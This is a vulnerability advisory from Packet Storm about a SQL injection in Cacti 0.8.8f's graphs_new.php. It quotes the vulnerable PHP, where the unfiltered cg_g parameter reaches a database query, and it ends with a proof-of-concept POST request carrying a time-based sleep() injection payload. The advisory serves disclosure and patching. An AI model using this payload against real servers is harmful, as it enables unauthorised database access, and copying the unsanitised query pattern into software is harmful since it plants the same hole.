Cacti 0.8.8f graphs_new.php SQL Injection

2016-01-09T00:00:00
ID PACKETSTORM:135191
Type packetstorm
Reporter changzhao.mao
Modified 2016-01-09T00:00:00

Description

                                        
                                            `Application: Cacti   
Vendor URL: http://www.cacti.net   
Bugs: SQL injection   
Author:changzhao.mao(DBAPPSecurity Ltd)   
Version affected: 0.8.8f and prior  
================================  
Introduction  
================================  
Cacti is a complete frontend to RRDTool, it stores all of the necessary information to create graphs and populate them with data in a MySQL database. The frontend is completely PHP driven. Along with being able to maintain Graphs, Data Sources, and Round Robin Archives in a database, cacti handles the data gathering. There is also SNMP support for those used to creating traffic graphs with MRTG. SQL injection vulnerabilities has been discovered.The vulnerability allows any users to execute own sql commands to compromise the web-applicaation or database management system. SQL injection Vulnerability has been discovered in Cacti(0.8.8f) and prior , which can be exploited by any user to conduct SQL Injection attacks.A patch has been released http://bugs.cacti.net/file_download.php?file_id=1201&type=bug .  
================================  
[Vulnerability info]  
================================  
  
in graphs_new.php , trace parameter cg_g  
  
function form_save() {  
if (isset($_POST["save_component_graph"])) {  
/* summarize the 'create graph from host template/snmp index' stuff into an array */  
while (list($var, $val) = each($_POST)) {  
if (preg_match('/^cg_(\d+)$/', $var, $matches)) {  
$selected_graphs["cg"]{$matches[1]}{$matches[1]} = true;  
  
//cg_g is not filtered  
  
}elseif (preg_match('/^cg_g$/', $var)) {  
if ($_POST["cg_g"] > 0) {  
$selected_graphs["cg"]{$_POST["cg_g"]}{$_POST["cg_g"]} = true;  
}  
}elseif (preg_match('/^sg_(\d+)_([a-f0-9]{32})$/', $var, $matches)) {  
$selected_graphs["sg"]{$matches[1]}{$_POST{"sgg_" . $matches[1]}}{$matches[2]} = true;  
}  
}  
  
if (isset($selected_graphs)) {  
host_new_graphs($_POST["host_id"], $_POST["host_template_id"], $selected_graphs);  
exit;  
}  
  
header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);  
}  
  
if (isset($_POST["save_component_new_graphs"])) {  
host_new_graphs_save();  
  
header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);  
}  
}  
  
  
function host_new_graphs($host_id, $host_template_id, $selected_graphs_array) {  
/* we use object buffering on this page to allow redirection to another page if no  
fields are actually drawn */  
ob_start();  
  
include_once("./include/top_header.php");  
  
print "<form method='post' action='graphs_new.php'>\n";  
  
$snmp_query_id = 0;  
$num_output_fields = array();  
  
while (list($form_type, $form_array) = each($selected_graphs_array)) {  
while (list($form_id1, $form_array2) = each($form_array)) {  
if ($form_type == "cg") {  
$graph_template_id = $form_id1;  
//sql injection in graph_template_id  
html_start_box("<strong>Create Graph from '" . db_fetch_cell("select name from graph_templates where id=$graph_template_id") . "'", "100%", "", "3", "center", "");  
}elseif ($form_type == "sg") {  
while (list($form_id2, $form_array3) = each($form_array2)) {  
/* ================= input validation ================= */  
input_validate_input_number($snmp_query_id);  
/* ==================================================== */  
  
$snmp_query_id = $form_id1;  
$snmp_query_graph_id = $form_id2;  
  
  
================================  
[Exploit]  
================================  
POC:  
  
POST /cacti/graphs_new.php HTTP/1.1  
Host: 192.168.217.133  
Content-Type: application/x-www-form-urlencoded  
Cookie: 1c4af7f2e90e3a789e67a8e3acd2372f=8a83va6ijomgf7qdgfpcl8l1p2; Cacti=j8chtc1ppq4n7viqkbah6c4tv2  
Content-Length: 189  
__csrf_magic=sid%3Aed226a87fdcc8e055d1c27b620e564d629d95e40%2C1450241184&cg_g=033926697+xor+(select(0)from(select sleep(5))v)&save_component_graph=1&host_id=2&host_template_id=0&action=save   
  
  
  
  
`